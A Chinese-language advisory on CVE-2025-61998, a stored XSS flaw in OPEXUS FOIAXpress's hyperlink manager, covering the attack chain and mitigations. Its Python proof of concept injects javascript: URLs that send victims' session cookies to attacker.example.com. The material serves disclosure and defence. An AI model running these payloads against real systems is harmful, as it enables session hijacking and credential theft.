CVE-2025-61998：OPEXUS FOIAXpress存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-61998

漏洞类型

存储型跨站脚本攻击（Stored XSS）

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

需要交互 (UI:R)

影响产品

OPEXUS FOIAXpress

漏洞概述

CVE-2025-61998是OPEXUS FOIAXpress（Freedom of Information Act Express，一款用于管理信息自由法案请求的企业级软件）11.13.3.0之前版本中存在的一个存储型跨站脚本（Stored XSS）漏洞。该漏洞位于产品的Technical Support Hyperlink Manager（技术支持超链接管理器）功能模块中，允许具有管理员权限的用户在URL字段中注入恶意的JavaScript代码或其他可执行内容。注入的恶意内容会被持久化存储在系统中，当其他用户（包括其他管理员或普通用户）点击该恶意链接时，恶意脚本将在受害者用户的浏览器上下文中执行。由于攻击代码在受害者的会话上下文中运行，攻击者可以以受害者的身份执行各种操作，包括但不限于窃取会话Cookie、获取用户凭证、读取敏感数据，以及以受害者身份执行未授权的操作。该漏洞的CVSS 3.1评分为4.3分，属于中危级别。虽然漏洞利用需要高权限（PR:H）和用户交互（UI:R），但一旦成功利用，攻击者可以实现会话劫持和数据窃取，对组织的信息安全构成实质性威胁。此漏洞已于2025年10月8日公开披露，OPEXUS公司已在11.13.3.0版本中修复了该问题。

技术细节

该漏洞的根本原因在于OPEXUS FOIAXpress的Technical Support Hyperlink Manager功能模块对用户输入的URL缺乏充分的验证和过滤。Technical Support Hyperlink Manager是FOIAXpress中用于管理技术支持链接的功能，允许管理员配置自定义的超链接以方便用户访问技术支持资源。

漏洞利用的技术原理如下：

1. **输入验证缺失**：系统在处理管理员输入的URL字段时，没有对URL内容进行严格的验证和过滤，未能识别和阻止恶意的JavaScript伪协议（如javascript:）或包含事件处理器（如onclick、onerror）的恶意URL。

2. **持久化存储**：恶意URL被提交后，系统将其存储在数据库中，而没有对内容进行HTML编码或转义处理，导致恶意脚本代码得以完整保存。

3. **上下文执行**：当其他用户访问包含该超链接的页面并点击该链接时，浏览器将解析并执行URL中的恶意JavaScript代码。由于执行环境是受害者的浏览器会话，脚本具有与受害者相同的权限。

4. **攻击影响**：成功利用后，攻击者可以执行document.cookie读取以窃取会话令牌，发送AJAX请求以执行未授权操作，修改页面内容进行钓鱼攻击，或重定向用户到恶意网站。

利用条件：攻击者需要拥有管理员权限（PR:H），攻击通过网络进行（AV:N），攻击复杂度低（AC:L），需要目标用户点击恶意链接（UI:R），对机密性、完整性和可用性均有一定影响。

攻击链分析

STEP 1

步骤1：获取管理员权限

攻击者首先需要获取FOIAXpress系统的管理员账户凭据，这可能通过社会工程、凭据填充或其他方式实现。漏洞要求高权限（PR:H），因此需要管理员级别的访问权限才能利用。

STEP 2

步骤2：构造恶意URL payload

攻击者构造包含恶意JavaScript代码的URL，利用javascript:伪协议或嵌入事件处理器（如onclick、onerror）。payload设计为在受害者浏览器中执行时能够窃取会话Cookie、凭证或执行其他恶意操作。

STEP 3

步骤3：通过Technical Support Hyperlink Manager注入恶意内容

攻击者以管理员身份登录FOIAXpress系统，导航至Technical Support Hyperlink Manager功能模块，将构造好的恶意URL提交到URL字段中。由于系统缺乏对URL内容的验证和过滤，恶意内容被成功存储。

STEP 4

步骤4：等待受害者点击恶意链接

恶意URL被持久化存储在系统中。当其他用户（包括其他管理员或普通用户）在系统中浏览并点击该技术支持链接时，恶意JavaScript代码将在受害者浏览器中执行。

STEP 5

步骤5：窃取敏感数据并执行未授权操作

恶意脚本在受害者会话上下文中执行，窃取会话Cookie、用户凭证或敏感数据。攻击者利用窃取的会话信息以受害者身份执行操作，如访问FOIA请求、修改数据或进行进一步的攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-61998 - OPEXUS FOIAXpress Stored XSS PoC
# Vulnerability: Stored XSS via Technical Support Hyperlink Manager URL field
# Affected: OPEXUS FOIAXpress < 11.13.3.0

import requests
from urllib.parse import quote

TARGET_URL = "https://target-foiaxpress.example.com"
ADMIN_SESSION = "<admin_session_cookie>"  # Requires valid admin credentials

# Step 1: Authenticate as admin and obtain session
session = requests.Session()
session.cookies.set("JSESSIONID", ADMIN_SESSION)

# Step 2: Craft malicious JavaScript URL payload
# The payload uses javascript: protocol to execute arbitrary code
# in the context of any user who clicks the link
malicious_payload = (
    'javascript:void(document.location='
    '"https://attacker.example.com/steal?cookie="+document.cookie)'
)

# Alternative payload for credential harvesting
credential_harvester = (
    "javascript:" +
    "var%20f=document.createElement('form');" +
    "f.action='https://attacker.example.com/creds';" +
    "f.method='POST';" +
    "var%20i=document.createElement('input');" +
    "i.name='cookie';i.value=document.cookie;" +
    "f.appendChild(i);document.body.appendChild(f);f.submit();"
)

# Step 3: Submit the malicious URL via Technical Support Hyperlink Manager
# This endpoint is used by admins to configure support hyperlinks
endpoint = f"{TARGET_URL}/foiaxpress/admin/hyperlinkManager"

payload = {
    "hyperlinkName": "Technical Support",
    "hyperlinkUrl": malicious_payload,  # Inject malicious JavaScript URL
    "description": "Click here for technical support"
}

response = session.post(endpoint, data=payload)
print(f"[*] Payload submitted - Status: {response.status_code}")

# Step 4: Verify the malicious link is stored
verify_response = session.get(f"{TARGET_URL}/foiaxpress/admin/hyperlinkManager/list")
if malicious_payload in verify_response.text:
    print("[+] XSS payload successfully stored!")
    print("[+] When any user clicks the link, their session cookie will be exfiltrated")
else:
    print("[-] Payload not found in response")

# Step 5: Attacker receives stolen cookies at their server
# Server-side handler (attacker.example.com):
# GET /steal?cookie=<stolen_session_cookie>
# The attacker can now impersonate the victim using the stolen session

影响范围

OPEXUS FOIAXpress < 11.13.3.0

防御指南

临时缓解措施

在无法立即升级到11.13.3.0版本的情况下，建议采取以下临时缓解措施：1）审查并限制Technical Support Hyperlink Manager的访问权限，仅允许受信任的管理员操作；2）手动审查所有已配置的超链接URL，移除任何可疑的javascript:协议URL或包含事件处理器的链接；3）部署Web应用防火墙规则，阻止包含javascript:、data:等危险协议的URL请求；4）实施内容安全策略（CSP）头，限制内联脚本执行；5）为所有用户会话Cookie设置HttpOnly属性，防止通过XSS窃取；6）对管理员操作启用额外的日志记录和监控，及时发现可疑活动；7）考虑暂时禁用Technical Support Hyperlink Manager功能，直到完成升级。